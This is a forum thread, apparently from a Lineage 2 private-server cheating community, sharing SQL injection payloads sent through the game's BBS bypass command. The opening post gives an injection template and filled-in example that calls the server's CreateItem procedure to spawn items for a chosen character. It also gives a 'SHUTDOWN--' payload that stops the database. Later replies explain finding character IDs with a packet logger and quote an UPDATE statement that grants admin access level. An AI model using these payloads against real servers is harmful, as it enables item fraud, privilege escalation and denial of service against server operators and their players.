SQL Injection (Part 2) BBS

[Maxtor]

Except /block there is onother way of sql injection thru BBS. These infos are coming from Maddeamon and all thanks go to him!

 

 

 

Edit your Help.htm and try these one:

 

 

 

bypass -h _bbsaddfav_'declare @s char(4)select @s='lin'+char(95)select_exec(@s+'CreateItem ''A'_B_C_D_0_0_'0'',0,1')--

 

 

 

 

 

A = Char ID (You can find it through L2Logger)

 

B = Item ID Item ID List

 

C = Quantity

 

D = Groove

 

 

 

 

 

 

 

 

 

Example: bypass -h _bbsaddfav_'declare @s char(4)select @s='lin'+char(95)select_exec(@s+'CreateItem ''579839'_287_1_30_0_0_'0'',0,1')--

 

 

 

 

 

 

 

bypass -h _bbsaddfav_'SHUTDOWN--

[malakiaole]

and here is the help.htm

 

(it's based on topic before)

[vis]

so what this exploit does exactly ? I'm not to familiar with help.htm's syntax :)

[Evil-X]

And the sense is what?

 

 

 

All private servers have dissable the BBS system after the 1st release.

[Francislaremote]

[..]

 

 

 

All private servers have dissable the BBS system after the 1st release.

 

That's true.

 

Thanks anyway for sharing, knowledge is power !

[Maxtor]

1st post updated

[kialles]

can someone give me a link to dowload l2logger?

 

I must had it and lost it :(

 

And now i search and i cant find it.. :(

[gostoso]

nice more Sql injections xD

[rogeruk]

Cant find any servers to test it on :( all have it disabled

[TofA]

How do we find the char ID? I have the l2logger, but I dont know how to find it. Pls help

[Francislaremote]

There is a packet called char info I think, in this packet you can find the char ID (at the beginning). (press tab a few time so the packet will be send a few time)

[apst]

Any other command that might work? like friendinvite or something?????

 

 

 

i think bbs is patched.....

[Maxtor]

and here is the help.htm

 

(it's based on topic before)

 

 

 

this help.htm doesnt work.

[TofA]

and here is the help.htm

 

(it's based on topic before)

 

 

 

this help.htm doesnt work.

 

 

 

Completely or only the codes are bad?

 

 

 

Ive found this on one russian site:

 

 

 

UPDATE ` characters ` SET ` accesslevel ` = ' 100 ' WHERE ` char_name ` = ' Nik_v_igre '; - puts access level.

 

 

 

$sql = ' UPDATE ` characters ` SET ` accesslevel ` = \ ' 100 \ ' WHERE ` char_name ` = \'Nik_v_igre \ '; '; - and it too most, only PHP a code.

[gostoso]

tofa whats that do???